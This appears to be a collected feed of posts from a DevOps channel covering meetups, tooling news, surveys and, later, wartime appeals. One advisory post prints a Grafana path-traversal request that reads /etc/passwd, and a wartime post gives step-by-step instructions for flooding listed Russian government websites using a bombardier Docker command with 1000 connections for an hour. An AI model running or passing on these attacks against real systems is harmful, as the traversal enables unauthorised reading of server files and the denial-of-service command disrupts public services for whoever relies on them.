Говорилка CatOps 01: контр офферы

CatOps (@catops) записал чат, но получилось как подкаст - отличная инициатива! Просто вау!

Первое видео тут:
https://www.youtube.com/watch?v=LV_0fK_Mm-s

Подписываться тут:
https://anchor.fm/catops

Call for Papers: Kyiv DevOps Community

Kyiv DevOps Community повертається!

Call for Papers до 13 листопада 2021 - якщо є цікава тема, але немає досвіду виступів - не проблема.
Законтрібьютити може кожен! 🔥

Цікаво було б послухати:
- Моніторинг
- CNCF/Hashicorp/Kubernetes
- Все, що контейнери і пайплайни (ArgoCD, Airflow, KubeFlow, Crossplane, etc)
- Lessons learned (how to become, how to survive) - акцент на користь
- Культурні підходи, взаємодія, перемоги і поразки

https://sessionize.com/kyiv-devops-community-2021/

DEV Challenge XVIII

Регистрация на самое больше европейское IT-соревнования - DEV Challenge XVIII. Представьте: есть номинации на бекенд, фронтенд, дизайн, и второй год вподряд есть номинация DevOps!

В нашей номинации DevOps будет 3 раунда: квалификация (пока еще регистрация открыта), онлайн раунд, и финал. На квалификации всего 2 вопроса, и они очень изичные: можно ответить и за 5, и за 10 минут - все зависит от желания раскрыть тему.

Это мероприятие стоит поддержать как минимум по причине того, что это второе (!) такого рода мероприятие для DevOps, в прошлом году мы показали активность - и важно не сбавлять обороты.

Регистрируйтесь по ссылке :
✅ https://devchallenge.it/

(если надоело делать скучный terraform apply на работе)
(если вы стали упитанным котом и хотите расшевелиться)
(если хочется девопс-кофейка и энергии)
(понять ту самую тулу, которой в компании нет)
(или наконец-то клацнуть кубер)

Давайте строить сообщество вместе 👍

Introducing Prometheus Agent Mode

The Agent mode optimizes Prometheus for the remote write use case. It disables querying, alerting, and local storage, and replaces it with a customized TSDB WAL. Everything else stays the same: scraping logic, service discovery and related configuration.

Нормально! 💪

https://prometheus.io/blog/2021/11/16/agent/

Kyiv DevOps Community Meetup

Завтра в 18:00 намечается Kyiv DevOps Community Meetup:
https://www.facebook.com/events/414266543706233 👈 тут FB страничка митапа

Доклады:
1. Сергей Михно (WIX) - Migration logs system from ELK to Clickhouse - технически очень сильный доклад (Clickhouse, Vector, Golang, Big Data, 4 trillion logs)
2. Сергей Василенко (Grammarly) - AWS macOS EC2 Instances for CI/CD - интересно узнать, как Grammarly делают билды десктопа (который вот только зарелизили), как работают с macOS, и как это архитектурно сделано
3. @me - Monitoring Platform 101 - баззворды kube-prometheus-stack, VictoriaMetrics, Cloudwatch exporter(s), KEDA, dashboarding/alerting as a code, sloth

https://www.youtube.com/watch?v=IghhSgShKlc ❗️тут будет трансляция и можно поставить напоминалку

Также добавляю что это отличная площадка для дебютных докладов, если у вас всегда было желание и не было практики сделать public talk - мы открываем Call For Papers сразу после этого стрима.

Записи будут, но очень желательно поддержать докладчиков онлайном 🙏

Kyiv DevOps Community Meetup - в эфире!

Первый докладчик уже заряжает, только начало - что-то сложное о Clickhouse:

https://www.youtube.com/watch?v=IghhSgShKlc

Подключайтесь!

Grafana 8.0+ 0 Day LFI

Прикривайте Grafana фаерволами и меняйте все секреты, потому что если у вас есть grafana-clock-panel - вы подвержены 0day уязвимости. Простой GET запрос такого типа будет работать:

GET /public/plugins/grafana-clock-panel/../../../../../../../etc/passwd

Уязвимый кусок кода:
https://github.com/grafana/grafana/blob/main/pkg/api/plugins.go#L300-L303

Пример работы уязвимости:
https://github.com/Vulnmachines/grafana-unauth-file-read

BugBounty в Twitter:
https://twitter.com/naglinagli/status/1468155313182416899

За новость спасибо Pavel Dmytrenko 🙏

UPD1: В clickhouse-grafana такая же беда - Serhii Mikhno
UPD2: Уязвимые плагины: https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/grafana/grafana-file-read.yaml
UPD3: Grafana 8.3.1, 8.2.7, 8.1.8, and 8.0.7 зарелизили сегодня с фиксом - @oleg_log

Зарплатный опрос на DOU.UA

Проходит регулярный анонимный опрос по зарплатам на DOU.UA. Эту штуку, и особенно ползунок опыт-зарплата регулярно используют менеджеры, рекрутеры, в целом - все, кто нанимает. На эти цифры реально ориентируются, хотя и все знают - что они занижены.

Эти цифры потом помогают компаниям не повышать компенсацию, поэтому - настоятельно прошу заполнять опрос, особенно - если вы поменяли компанию, сделали себе крутой райз по зп, и выглядите как красивый девопс (конечно, это мем).

Если заполнять все формы - занимает 10 минут, если пропускать половину - 1 минута. Это важно 👇

https://dou.ua/goto/2vJJ

After I published my article about Kubernetes backups, I got some questions regarding cluster organization and maintenance procedure. Specifically about managing Kubernetes clusters “as cattle” and this statement:

…*investing in cluster automation early on* is important. You may end up in a situation when you need to re-create a cluster from scratch.

I started writing an article about managing clusters “as cattle” to address these questions. Moreover, that was my initial plan. However, I realized that I have very little exposure on how other people are managing their clusters! I have only the perspective of my current and my previous employers.

Thus, I decided to issue a survey on how people are managing their Kubernetes clusters, their core components like CNI, Ingress, etc., and business applications.

I would appreciate it, if you can spend some time filling up this survey. You can also reach out to me directly and share your story of managing Kubernetes in your company. I left contacts in that Google form.

Here’s the link to that article about backups, in case you missed it.

Have a great week, y’all!

#kubernetes

Guided DevOps Meditation

Улучшалка настроения - всем хорошего дня! 🤝

A cloud around you ☁️
A cloud around you is completely provisioned using Terraform
The developers are opening Pull Requests for creating new resources using Terraform
The developers are not even using Web UI 🤣

https://www.youtube.com/watch?v=epcbx5HkCbM

Elasticstack Provider

Зарелизили ElasticStack провайдер для Terraform.

Можно:
1. Свой сетап (не обязательно Elastic Cloud)
2. Создание, сетинги и мапинги индексов
3. Lifecycle Policy для индексов (полезно)
4. Индекс темплейт для новых индексов
5. Юзеров и частично snapshot api

Нельзя:
- Kibana, и все что касается Kibana - ноль ресурсов
- Очень жду Kibana dashboards as a Code

https://registry.terraform.io/providers/elastic/elasticstack/latest/docs

UPD: В коментах подсказали, что также есть рабочий оператор:
https://www.elastic.co/guide/en/cloud-on-k8s/current/index.html

Увага! War in Ukraine

Девопси-українці: у вас є гроші, переводьте їх на потребу армії. Надсилайте гроші територіальній обороні, спонсоруйте все, що потенційно може бути корисним.

Секопси-українці: підключайтесь до захисту державних сайтів. Інтегріть клаудфлер, впилюйте фаєрволи.

Менеджери: оранізуйте волонтерство, допомогу на місцях хто цього потребує.

Джуни: видаляйте в коментарях всіляку дічь.

Підписникам з інших країн: нас єбошать.

Я розумію що буде відписка, але насрати на відписку, якщо в 5 ранку у вас летять ракети. До сраки пости про Admiralty і HashiCorp Vault OIDC Provider, коли ваша сім‘я в небезпеці.

Один із варіантів збору коштів:
https://savelife.in.ua/

Слава Україні! 🇺🇦

Так, це український канал.

Додаю аудіозаписи - для збільшення конструктивних дій і зменшення паніки.

Приклад додаю в коментарі.

Поширюйте.

Reface просять в особисті повідомлення надсилати такі дані:

- Потрібні знімки із супутників або дронів. Як історичні, так і ті, що надходитимуть з поля бою.
- Для цього – відповідні контакти із ЗСУ (для дронів та безпілотників).
- Або на компанії, що знімають супутникові знімки.

Ми не хотiли нiкого вбивати, але зараз ми покажем, що ми браття козацького роду

Ви можете використовувати ваш комп'ютер як зброю, роблячи ДДОС атаки!
Ось інструкція, як це можна зробити:
- завантажити Докер (можна десктоп)
- і в терміналі написати docker run -ti --rm alpine/bombardier -c 1000 -d 3600s -l https://www.gosuslugi.ru де в кінці ви міняєте сайт на один зі списку
Вікон термінала може бути безліч.

https://www.gosuslugi.ru
https://epp.genproc.gov.ru
https://ach.gov.ru
https://www.scrf.gov.ru
https://mil.ru

🇺🇦

Беларусь!
Это видео должны увидеть все! Все десантники, все отцы-командиры, все офицеры и военнослужащие Республики Беларусь!
Это не пропаганда, это правда этой войны. Войны, в которую пытается втянуть Беларусь Российская Федерация. Смотрите, слушайте, распространяйте это видео. Правда и честь победит!
https://youtu.be/SWfwAKnSYj8

Github Feedback

DevOps-пост, вы знаете что делать: 👇

https://github.com/github/feedback/discussions/12042

Ban Russia from the Cloudflare

Repost + vote + comment 👇

Давайте девопсовые войска, погнали

https://www.linkedin.com/posts/bukovskyi-kostiantyn_cloudflare-and-lets-encrypt-josh-aas-and-activity-6904022489488601088-eNDM

Share across India folks

Индия не особо нас поддерживает - пошарьте с вашими ребятами из Индии

Девопсовые войска, второе спецзадание 👇

Кто работает с индусами - комент + репост

https://www.linkedin.com/posts/stanislav-kelberg-16770736_indian-student-killed-in-shelling-in-ukraine-activity-6904387533484957696-0wqu